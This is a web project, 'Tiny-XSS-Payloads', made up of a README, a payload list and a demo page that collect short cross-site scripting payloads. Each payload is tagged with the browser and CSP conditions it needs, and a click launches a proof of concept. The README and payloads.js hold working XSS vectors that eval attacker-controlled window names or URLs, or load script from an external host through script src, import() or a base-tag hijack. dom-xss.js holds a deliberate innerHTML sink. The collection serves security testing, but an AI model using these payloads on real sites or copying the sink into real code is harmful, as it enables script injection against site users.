├── CNAME
├── README.md
├── dom-xss.js
├── index.html
├── intro.png
├── main.js
├── payloads.js
└── style.css


/CNAME:
--------------------------------------------------------------------------------
1 | tinyxss.terjanq.me


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
  1 | # Tiny-XSS-Payloads
  2 | A collection of short XSS payloads that can be used in different contexts.
  3 | 
  4 | The DEMO available here: <https://tinyxss.terjanq.me>
  5 | 
  6 | 
  7 | ## Current Payloads
  8 | 
  9 | ```html
 10 | <!-- Requires a relative script inserted to the DOM after the sink, 
 11 |   e.g. <base/href=//NJ.₨> ... <script src=/aaa></script> -->
 12 | <base/href=//NJ.₨>
 13 | ```
 14 | 
 15 | ```html
 16 | <!-- Only works as reflected XSS -->
 17 | <svg/onload=eval(name)>
 18 | ```
 19 | 
 20 | ```html
 21 | <!-- If you control the URL -->
 22 | <svg/onload=eval(`'`+URL)>
 23 | ```
 24 | 
 25 | ```html
 26 | <!-- If you control the name, but unsafe-eval not enabled -->
 27 | <svg/onload=location=name>
 28 | ```
 29 | 
 30 | ```html
 31 | <!-- In chrome, also works inside innerHTML, even on elements not yet inserted into DOM -->
 32 | <svg><svg/onload=eval(name)>
 33 | ```
 34 | 
 35 | ```html
 36 | <!-- If you control window's name, this payload will work inside innerHTML, even on elements not yet inserted into the DOM -->
 37 | <audio/src/onerror=eval(name)>
 38 | ```
 39 | 
 40 | ```html
 41 | <!-- If you control the URL, this payload will work inside innerHTML, even on elements not yet inserted into the DOM -->
 42 | <img/src/onerror=eval(`'`+URL)>
 43 | ```
 44 | 
 45 | ```html
 46 | <!-- Just a casual script -->
 47 | <script/src=//NJ.₨></script>
 48 | ```
 49 | 
 50 | ```html
 51 | <!-- If you control the name of the window -->
 52 | <iframe/onload=src=top.name>
 53 | ```
 54 | 
 55 | ```html
 56 | <!-- If you control the URL -->
 57 | <iframe/onload=eval(`'`+URL)>
 58 | ```
 59 | 
 60 | ```html
 61 | <!-- If number of iframes on the page is constant -->
 62 | <iframe/onload=src=top[0].name+/\NJ.₨?/>
 63 | ```
 64 | 
 65 | ```html
 66 | <!-- for Firefox only -->
 67 | <iframe/srcdoc="<svg><script/href=//NJ.₨ />">
 68 | ```
 69 | 
 70 | ```html
 71 | <!-- If number of iframes on the page is random -->
 72 | <iframe/onload=src=contentWindow.name+/\NJ.₨?/>
 73 | ```
 74 | 
 75 | ```html
 76 | <!-- If unsafe-inline is disabled in CSP and external scripts allowed -->
 77 | <iframe/srcdoc="<script/src=//NJ.₨></script>">
 78 | ```
 79 | 
 80 | ```html
 81 | <!-- If inline styles are allowed -->
 82 | <style/onload=eval(name)>
 83 | ```
 84 | 
 85 | ```html
 86 | <!-- If inline styles are allowed and the URL can be controlled -->
 87 | <style/onload=eval(`'`+URL)>
 88 | ```
 89 | 
 90 | ```html
 91 | <!-- If inline styles are blocked -->
 92 | <style/onerror=eval(name)>
 93 | ```
 94 | 
 95 | ```html
 96 | <!-- Uses external script as import, doesn't work in innerHTML -->
 97 | <!-- The PoC only works on https and Chrome, because NJ.₨ checks for Sec-Fetch-Dest header -->
 98 | <svg/onload=import(/\\NJ.₨/)>
 99 | ```
100 | 
101 | ```html
102 | <!-- Uses external script as import,  triggers if inline styles are allowed.
103 | <!-- The PoC only works on https and Chrome, because NJ.₨ checks for Sec-Fetch-Dest header -->
104 | <style/onload=import(/\\NJ.₨/)>
105 | ```
106 | 
107 | ```html
108 | <!-- Uses external script as import -->
109 | <!-- The PoC only works on https and Chrome, because NJ.₨ checks for Sec-Fetch-Dest header -->
110 | <iframe/onload=import(/\\NJ.₨/)>
111 | ```
112 | 
113 | Deprecated:
114 | 
115 | ```html
116 | <!-- If you control the URL, Safari-only -->
117 | <iframe/onload=write(URL)>
118 | ```
119 | 
120 | ```html
121 | <!-- If inline styles are allowed, Safari only -->
122 | <style/onload=write(URL)>
123 | ```
124 | 


--------------------------------------------------------------------------------
/dom-xss.js:
--------------------------------------------------------------------------------
1 | onload = () => {
2 |     url = new URL(location.href);
3 |     payload.innerHTML = url.searchParams.get('dom_xss');
4 | }


--------------------------------------------------------------------------------
/index.html:
--------------------------------------------------------------------------------
 1 | <html>
 2 |     <head>
 3 |         <title>Tiny XSS Payloads</title>
 4 | 
 5 |         <meta charset="utf-8">
 6 |         <meta name="twitter:card" content="summary_large_image">
 7 |         <meta name="twitter:site" content="terjanq">
 8 |         <meta name="twitter:title" content="Tiny XSS Payloads">
 9 |         <meta name="twitter:description" content="A collection of small XSS payloads">
10 |         <meta name="twitter:image" content="https://terjanq.github.io/Tiny-XSS-Payloads/intro.png">
11 | 
12 |         <link rel="stylesheet" href="//cdnjs.cloudflare.com/ajax/libs/highlight.js/10.1.1/styles/github.min.css">
13 |         <link rel="stylesheet" href="style.css">
14 | 
15 |         <script src="//cdnjs.cloudflare.com/ajax/libs/highlight.js/10.1.1/highlight.min.js"></script>
16 |         <script src="payloads.js"></script> 
17 | 
18 |         <script async defer src="https://buttons.github.io/buttons.js"></script>
19 |         <script async src="https://platform.twitter.com/widgets.js" charset="utf-8"></script>
20 |     </head>
21 |     <body>
22 |         
23 | 
24 |         <div class=main>
25 |             <h1>Tiny XSS Payloads</h1>
26 | 
27 |             <div class="subtitle">
28 |                <a class="repo-link"  href="https://github.com/terjanq/Tiny-XSS-Payloads">github.com/terjanq/Tiny-XSS-Payloads</a> <a class="github-button"  style="display: none" href="https://github.com/terjanq/Tiny-XSS-Payloads" data-color-scheme="no-preference: light; light: light; dark: dark;" data-icon="octicon-star" data-size="large" data-show-count="true" aria-label="Star terjanq/Tiny-XSS-Payloads on GitHub">Star</a>
29 |                <span class=twitter>
30 |                     <a href="https://twitter.com/terjanq" style="display: none" class="twitter-follow-button" data-show-count="false">Follow @terjanq</a>
31 |                </span>
32 |             </div>
33 |             
34 | 
35 |             <h2>Features available</h2>
36 |             <form id="checkboxesForm" onchange="process(this)">
37 |         
38 |             </form>
39 | 
40 |             <h2>Payloads</h2>
41 |             <div id="payloads">
42 |             
43 |             </div>
44 |         </div>
45 |         
46 |         <script src="main.js"></script>
47 |     </body>
48 | </html>
49 | 


--------------------------------------------------------------------------------
/intro.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/terjanq/Tiny-XSS-Payloads/133544d8badf16d4e5f9af7e1fc3f7d5ca64d162/intro.png


--------------------------------------------------------------------------------
/main.js:
--------------------------------------------------------------------------------
  1 | const checkboxesForm = document.getElementById('checkboxesForm');
  2 | const payloadsDiv = document.getElementById("payloads")
  3 | 
  4 | const enc = encodeURIComponent;
  5 | 
  6 | for (const tag of Object.values(TAGS)) {
  7 |     let feature = document.createElement('div');
  8 |     feature.className = "feature";
  9 | 
 10 |     checkboxesForm.append(feature);
 11 | 
 12 |     let checkbox = document.createElement('input');
 13 |     checkbox.type = 'checkbox';
 14 |     checkbox.checked = 1;
 15 |     checkbox.id = tag;
 16 |     feature.appendChild(checkbox);
 17 | 
 18 |     let label = document.createElement('label');
 19 |     label.htmlFor = tag;
 20 |     label.innerHTML = tag;
 21 |     feature.appendChild(label);
 22 | 
 23 | }
 24 | 
 25 | function execute_payload(payload, type = "reflected") {
 26 | 
 27 |     const XSS_URL_BASE = 'https://terjanq.me/xss.php'
 28 |     let name = '';
 29 |     let hash = '';
 30 |     let contentType = '';
 31 |     let referrer = '';
 32 | 
 33 |     const csp_dict = {
 34 |         'default-src': [`'none'`],
 35 |     };
 36 | 
 37 |     function add_to_csp(key, value) {
 38 |         if (!csp_dict[key]) csp_dict[key] = [];
 39 |         csp_dict[key].push(value);
 40 |     }
 41 | 
 42 |     function construct_csp() {
 43 |         let csp_string = "";
 44 |         for (let key in csp_dict) {
 45 |             csp_string += `${key} ${csp_dict[key].join(' ')};`;
 46 |         }
 47 |         return csp_string;
 48 |     }
 49 | 
 50 |     function construct_xss_url(query_dict, hash = '') {
 51 |         const url = new URL(XSS_URL_BASE);
 52 |         for (let key in query_dict) {
 53 |             if (query_dict[key] === '') continue;
 54 |             url.searchParams.append(key, query_dict[key]);
 55 |         }
 56 |         if (hash !== '') {
 57 |             url.hash = hash
 58 |         }
 59 |         return url.toString();
 60 |     }
 61 | 
 62 |     if (payload.tags.includes(TAGS.controlsName)) {
 63 |         name = 'javascript:alert(document.domain)//'
 64 |     }
 65 |     if (payload.tags.includes(TAGS.inlineStyleAllow)) {
 66 |         add_to_csp('style-src', "'unsafe-inline'");
 67 |     }
 68 |     if (payload.tags.includes(TAGS.scripts)) {
 69 |         add_to_csp('script-src', "http: https:");
 70 |     }
 71 |     if (payload.tags.includes(TAGS.unsafeEval)) {
 72 |         add_to_csp('script-src', `'unsafe-eval'`)
 73 |     }
 74 |     if (payload.tags.includes(TAGS.unsafeInline)) {
 75 |         add_to_csp('script-src', `'unsafe-inline'`)
 76 |     }
 77 |     if (payload.tags.includes(TAGS.iframes)) {
 78 |         add_to_csp('frame-src', 'http: https:');
 79 |         referrer = 'origin';
 80 |     }
 81 |     if (payload.tags.includes(TAGS.controlsURL)) {
 82 |         hash = `#/*<iframe/onload="/*'/**/;alert(document.domain)//">`
 83 |     }
 84 |     // add content-type to the page so the nj.rs will display appriopriate content-type
 85 |     if (payload.tags.includes(TAGS.scripts)) {
 86 |         contentType = 'application/javascript;charset=UTF-8'
 87 |     }
 88 | 
 89 |     let html = payload.html;
 90 |     let dynamic_script = '';
 91 |     if(payload.tags.includes(TAGS.requiresRelativeScript)){
 92 |         dynamic_script = `
 93 | const script = document.createElement('script');
 94 | script.src = '/empty'
 95 | document.head.appendChild(script);
 96 | `
 97 |         html += '<script src="/empty"></script>'
 98 |     }
 99 |     let dom_xss = ''
100 | 
101 |     if (type === 'DOM') {
102 |         add_to_csp('script-src', "data:");
103 |         
104 |         let payload_content = `
105 | onload = () => {
106 |     url = new URL(location.href);
107 |     payload.innerHTML = url.searchParams.get('dom_xss');${dynamic_script}
108 | };`
109 |         let payload_src = `data:text/javascript,${encodeURIComponent(payload_content)}`
110 |         html = `<html><head></head><body><div id=payload></div></body></html><script src="${payload_src}"></script>`;
111 |         dom_xss = payload.html
112 |     }
113 | 
114 |     const xss_url = construct_xss_url({
115 |         dom_xss: dom_xss,
116 |         html: html,
117 |         csp: construct_csp(),
118 |         '__content-type': contentType,
119 |         referrer: referrer
120 |     }, hash)
121 | 
122 |     x = open(xss_url, name);
123 | }
124 | 
125 | 
126 | function createPayloads(payloads) {
127 |     payloads.sort((x, y) => x.html.length - y.html.length)
128 |     for (let payload of payloads) {
129 |         let div = document.createElement('div');
130 |         div.className = "payload";
131 | 
132 |         let pre = document.createElement('pre');
133 |         let code = document.createElement('code')
134 |         pre.appendChild(code)
135 |         div.appendChild(pre)
136 | 
137 |         code.innerText = payload.html;
138 |         code.classList.add('xml', 'hljs');
139 | 
140 |         hljs.highlightBlock(code);
141 | 
142 |         let counter = document.createElement('span');
143 |         counter.className = 'counter';
144 |         counter.innerText = payload.html.length;
145 |         div.appendChild(counter);
146 | 
147 |         let pocs = document.createElement('div');
148 |         pocs.className = 'pocs';
149 | 
150 |         div.appendChild(pocs);
151 | 
152 |         let pocReflected = document.createElement('span');
153 |         pocReflected.className = 'poc-reflected';
154 |         pocs.appendChild(pocReflected);
155 | 
156 |         let pocDOM = document.createElement('span');
157 |         pocDOM.className = 'poc-dom';
158 |         pocs.appendChild(pocDOM);
159 | 
160 |         pocReflected.onclick = _ => execute_payload(payload, 'reflected')
161 |         pocDOM.onclick = _ => execute_payload(payload, 'DOM')
162 | 
163 |         let tags = document.createElement('div');
164 |         tags.className = "tags"
165 |         div.appendChild(tags);
166 | 
167 |         for (let tag of payload.tags) {
168 |             let span = document.createElement('span');
169 |             span.className = "tag";
170 |             span.innerText = tag;
171 |             tags.appendChild(span)
172 |         }
173 |         payloadsDiv.appendChild(div)
174 |     }
175 | 
176 | }
177 | 
178 | function process(e) {
179 |     payloadsDiv.innerHTML = '';
180 | 
181 |     const checkboxes = checkboxesForm.querySelectorAll('input[type=checkbox]')
182 |     let tags = []
183 |     for (let checkbox of checkboxes) {
184 |         if (checkbox.checked) {
185 |             tags.push(checkbox.id)
186 |         }
187 |     }
188 | 
189 |     let payloads = []
190 | 
191 |     for (const payload of PAYLOADS) {
192 |         if (payload.tags.every(t => tags.includes(t))) {
193 |             payloads.push(payload)
194 |         }
195 |     }
196 | 
197 |     createPayloads(payloads);
198 | }
199 | 
200 | process()


--------------------------------------------------------------------------------
/payloads.js:
--------------------------------------------------------------------------------
  1 | const TAGS = {
  2 |     // chrome: 'chromium',
  3 |     // firefox: 'firefox',
  4 |     // safari: 'safari',
  5 |     unsafeInline: 'script-unsafe-inline',
  6 |     inlineStyleAllow: 'style-inline-allowed',
  7 |     inlineStyleBlock: 'style-inline-blocked',
  8 |     unsafeEval: 'unsafe-eval',
  9 |     scripts: 'external-scripts',
 10 |     iframes: 'external-iframes',
 11 |     controlsLength: 'controls-index-of-iframe',
 12 |     controlsName: 'controls-name',
 13 |     controlsURL: 'controls-URL',
 14 |     notInner: 'not-innerHTML',
 15 |     chromeOnly: 'chrome-only',
 16 |     safariOnly: 'safari-only',
 17 |     firefoxInner: 'firefox-innerHTML',
 18 |     chromeInner: 'chrome-innerHTML',
 19 |     requiresRelativeScript: 'requires-relative-script-after-injection'
 20 | }
 21 | 
 22 | const PAYLOADS = [
 23 |     {
 24 |         html: '<base/href=//NJ.₨>',
 25 |         tags: [TAGS.requiresRelativeScript, TAGS.scripts],
 26 |         author: null,
 27 |     },
 28 |     {
 29 |         html: '<script/src=//NJ.₨><\/script>',
 30 |         tags: [TAGS.scripts, TAGS.notInner],
 31 |         author: null,
 32 |     },
 33 |     {
 34 |         html: '<iframe/onload=src=top.name>',
 35 |         tags: [TAGS.unsafeInline, TAGS.controlsName],
 36 |         author: '@terjanq'
 37 |     },
 38 |     {
 39 |         html: '<iframe/onload=src=top[0].name+/\\NJ.₨/>',
 40 |         tags: [TAGS.iframes, TAGS.unsafeInline, TAGS.controlsLength],
 41 |         author: '@terjanq'
 42 |     },
 43 |     {
 44 |         html: '<iframe/onload=src=contentWindow.name+/\\NJ.₨/>',
 45 |         tags: [TAGS.iframes, TAGS.unsafeInline],
 46 |         author: '@terjanq'
 47 |     },
 48 |     {
 49 |         html: '<iframe/srcdoc="<script/src=//NJ.₨><\/script>">',
 50 |         tags: [TAGS.scripts],
 51 |         author: null,
 52 |     },
 53 |     {
 54 |         html: '<iframe/srcdoc="<svg><script/href=//NJ.₨ />">',
 55 |         tags: [TAGS.scripts],
 56 |         author: null,
 57 |     },
 58 |     {
 59 |         html: "<iframe/onload=eval(`'`+URL)>",
 60 |         tags: [TAGS.unsafeEval, TAGS.unsafeInline, TAGS.controlsURL],
 61 |         author: '@wcbowling'
 62 |     },
 63 | /* deprecated */
 64 | //     {
 65 | //         html: "<iframe/onload=write(URL)>",
 66 | //         tags: [TAGS.safariOnly, TAGS.unsafeInline, TAGS.controlsURL],
 67 | //         author: '@kinugawamasato'
 68 | //     },
 69 |     {
 70 |         html: "<svg/onload=eval(name)>",
 71 |         tags: [TAGS.unsafeInline, TAGS.unsafeEval, TAGS.controlsName, TAGS.notInner],
 72 |         author: null,
 73 |     },
 74 |     {
 75 |         html: "<svg/onload=eval(`'`+URL)>",
 76 |         tags: [TAGS.unsafeInline, TAGS.unsafeEval, TAGS.controlsURL, TAGS.notInner],
 77 |         author: '@wcbowling'
 78 |     },
 79 |     {
 80 |         html: "<svg/onload=location=name>",
 81 |         tags: [TAGS.unsafeInline, TAGS.controlsName, TAGS.notInner],
 82 |         author: null
 83 |     },
 84 |     {
 85 |         html: "<svg><svg/onload=eval(name)>",
 86 |         tags: [TAGS.unsafeInline, TAGS.unsafeEval, TAGS.controlsName, TAGS.notInner, TAGS.chromeInner],
 87 |         comment: 'Will work inside innerHTML in Chrome',
 88 |         author: ['@ZeddYu_Lu', '@phithon_xg'],
 89 |     },
 90 |     {
 91 |         html: "<audio/src/onerror=eval(name)>",
 92 |         tags: [TAGS.unsafeInline, TAGS.unsafeEval, TAGS.controlsName],
 93 |         comment: 'What is special about this payload is that it will work inside innerHTML on elements not yet inserted into the DOM',
 94 |         author: '@terjanq'
 95 |     },
 96 |     {
 97 |         html: "<img/src/onerror=eval(`'`+URL)>",
 98 |         tags: [TAGS.unsafeInline, TAGS.unsafeEval, TAGS.controlsURL],
 99 |         comment: 'What is special about this payload is that it will work inside innerHTML on elements not yet inserted into the DOM',
100 |         author: null
101 |     },
102 |     {
103 |         html: "<style/onload=eval(name)>",
104 |         tags: [TAGS.inlineStyleAllow, TAGS.unsafeEval, TAGS.unsafeInline, TAGS.controlsName],
105 |         author: null
106 |     },
107 | /* deprecated */
108 | //     {
109 | //         html: "<style/onload=write(URL)>",
110 | //         tags: [TAGS.safariOnly, TAGS.unsafeInline, TAGS.controlsURL, TAGS.inlineStyleAllow],
111 | //         author: '@kinugawamasato'
112 | //     },
113 |     {
114 |         html: "<style/onload=eval(`'`+URL)>",
115 |         tags: [TAGS.unsafeEval, TAGS.unsafeInline, TAGS.controlsURL, TAGS.inlineStyleAllow],
116 |         author: '@wcbowling'
117 |     },
118 |     {
119 |         html: "<style/onerror=eval(name)>",
120 |         tags: [TAGS.chromeOnly, TAGS.unsafeEval, TAGS.unsafeInline, TAGS.controlsName, TAGS.inlineStyleBlock],
121 |         author: null
122 |     },
123 |     {
124 |         html: "<svg/onload=import(/\\NJ.₨/)>",
125 |         tags: [TAGS.unsafeInline, TAGS.notInner, TAGS.firefoxInner, TAGS.scripts],
126 |         author: null
127 |     },
128 |     {
129 |         html: "<style/onload=import(/\\NJ.₨/)>",
130 |         tags: [TAGS.unsafeInline, TAGS.scripts, TAGS.inlineStyleAllow],
131 |         author: null
132 |     },
133 |     {
134 |         html: "<iframe/onload=import(/\\NJ.₨/)>",
135 |         tags: [TAGS.unsafeInline, TAGS.scripts],
136 |         author: null
137 |     },
138 | ]
139 | 


--------------------------------------------------------------------------------
/style.css:
--------------------------------------------------------------------------------
  1 | 
  2 | html{
  3 |     background: #f6f8fa!important
  4 | }
  5 | 
  6 | h2{
  7 |     color: #2f2f2f
  8 | }
  9 | .main{
 10 |     margin: auto;
 11 |     margin-top: 50px;
 12 |     max-width: 1000px;
 13 | }
 14 | 
 15 | #checkboxesForm{
 16 |     display: flex;
 17 |     flex-wrap: wrap;
 18 | }
 19 | 
 20 | #checkboxesForm .feature{
 21 |     flex: 1 20%;
 22 |     padding: 2px;
 23 | }
 24 | 
 25 | input[type=checkbox]:not(:first-child){
 26 |     margin-left: 15px;
 27 | }
 28 | 
 29 | input[type=checkbox], #checkboxesForm label{
 30 |     cursor: pointer;
 31 | }
 32 | 
 33 | #payloads{
 34 |     display: flex;
 35 |     flex-wrap: wrap;
 36 |     flex-direction: row;
 37 | }
 38 | 
 39 | .payload{
 40 |     flex: 1 0 25%;
 41 |     background: #e2e2e2;
 42 |     padding:10px;
 43 |     border-radius:5px;
 44 |     margin: 5px;
 45 |     position:relative;
 46 |     padding-left: 30px;
 47 |     display:inline-block;
 48 |     max-width: 500px;
 49 | }
 50 | 
 51 | .payload .tags{
 52 |     max-width: 400px;
 53 | }
 54 | 
 55 | .payload .tags span{
 56 |     background: #b3bfbf;
 57 |     font-size:13px;
 58 |     border-radius:3px;
 59 |     padding: 2px 4px;
 60 |     margin: 2px;
 61 |     pointer-events: none;
 62 |     display: inline-block;
 63 | }
 64 | 
 65 | .payload .counter{
 66 |     position:absolute;
 67 |     top:0;
 68 |     left:0;
 69 |     background: #adadad;
 70 |     font-size: 12px;
 71 |     padding: 4px;
 72 |     border-radius: 5px;
 73 |     color:white;
 74 |     font-weight: bold;
 75 |     pointer-events: none;
 76 | }
 77 | 
 78 | .payload .pocs{
 79 |     position:absolute;
 80 |     top:0;
 81 |     right:0;
 82 |     margin:0;
 83 |     padding:0;
 84 |     /* float: right; */
 85 | }
 86 | 
 87 | .payload .pocs span{
 88 |     margin-left: 5px;
 89 |     background: #adadad;
 90 |     padding: 4px;
 91 |     border-radius: 5px;
 92 |     text-decoration: none;
 93 |     cursor:pointer;
 94 |     font-size: 10px;
 95 |     color:white;
 96 |     font-weight: bold;
 97 |     float: right;
 98 | }
 99 | 
100 | .payload .poc-reflected{
101 |     right: 100px;
102 | }
103 | 
104 | .payload .poc-dom::before{
105 |     content: "PoC DOM"
106 | }
107 | 
108 | .payload .poc-reflected::before{
109 |     content: "PoC Reflected"
110 | }
111 | 
112 | .subtitle{
113 |     color: black;
114 |     display: inline-block;
115 |     opacity: 0.6;
116 |     height: 30px;
117 |     margin-top:-20px;
118 |     transform: scale(0.8);
119 |     transform-origin: left center;
120 | }
121 | .repo-link{
122 |     color: black;
123 |     text-decoration: none;
124 |     vertical-align: middle;
125 |     font-size: 22px;
126 | }
127 | 
128 | .subtitle span{
129 |     vertical-align: middle;
130 |     margin-left: 10px;
131 |     
132 | }
133 | 


--------------------------------------------------------------------------------